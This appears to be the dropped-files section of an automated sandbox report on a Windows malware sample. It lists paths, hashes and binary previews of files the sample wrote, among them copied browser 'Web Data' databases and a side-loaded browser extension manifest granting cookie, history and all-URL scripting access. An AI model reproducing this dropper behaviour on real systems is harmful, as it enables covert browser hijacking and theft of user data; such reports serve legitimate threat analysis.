                                                                                                                                                Size (bytes):6656
                                                                                                                                                Entropy (8bit):5.2861874904617645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                                MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                                SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                                SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                                SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):268744
                                                                                                                                                Entropy (8bit):5.398284390686728
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                                MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                                SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                                SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                                SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73160
                                                                                                                                                Entropy (8bit):6.49500452335621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                                MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                                SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                                SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):89600
                                                                                                                                                Entropy (8bit):6.46929682960805
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                                MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                                SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                                SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
                                                                                                                                                SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92080
                                                                                                                                                Entropy (8bit):5.923150781730819
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                                MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                                SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                                SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                                SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.|...|...|...t...|...p...|...p...|...p...|...p...|..~t...|..._...|...t...|..~t...|...|..6|..sk...|..sk...|...w...|..sk...|..Rich.|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\download_user.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3512776
                                                                                                                                                Entropy (8bit):6.514740710935125
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                                MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                                SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                                SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                                SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):503808
                                                                                                                                                Entropy (8bit):6.4043708480235715
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                                MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                                SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                                SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                                SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):348160
                                                                                                                                                Entropy (8bit):6.56488891304105
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                                MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                                SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                                SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                                SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):59904
                                                                                                                                                Entropy (8bit):6.753320551944624
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                                MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                                SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                                SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                                SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\ecvFEAD.tmp
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x0e9c6472, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26738688
                                                                                                                                                Entropy (8bit):0.919147268799695
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:GqX+wPy7f2s6JhNIhenjNa2fVccgeTaNX:G8s6Rn
                                                                                                                                                MD5:CEBB58A6BA0A64A6853BBE61CF15F909
                                                                                                                                                SHA1:15A85A4F09758DD26BEB3A867DEBB36E093F8BEE
                                                                                                                                                SHA-256:334F3C3C11CE18571D4827950985CEC05B162C868B443D3CADFAFEE187E57B29
                                                                                                                                                SHA-512:E9AF84474677FC19F0FB7A32962B87A311AF607582568ECD80EB13B5EAA11A72061F69F1654F83C1C6AEBD116FA60BF91502CE61F06BCAC0662160FE0E7AE103
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ..dr... .......Z........Ef..4...w.............................."....x{......x..h..............................W.4...w..............................................................................................[............B.................................................................................................................. ........$...y......................................................................................................................................................................................................................................C.'..$...y.}................w~.`'....x..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:;1033
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):237056
                                                                                                                                                Entropy (8bit):6.262405449836627
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ......................>.......................................................|.......|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...
                                                                                                                                                C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1397922
                                                                                                                                                Entropy (8bit):7.999863097294012
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5*zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~|J^.*YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....|..n1...Y.i4\.ZN..V....U)...|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.
                                                                                                                                                C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):293320
                                                                                                                                                Entropy (8bit):6.347427939821131
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Web Data1611970646229
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):36105
                                                                                                                                                Entropy (8bit):7.994610469125073
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                                C:\Users\user\AppData\Local\crx.json
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1981
                                                                                                                                                Entropy (8bit):5.365969892012237
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                                C:\Users\user\AppData\Localwebdata1611970646229
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
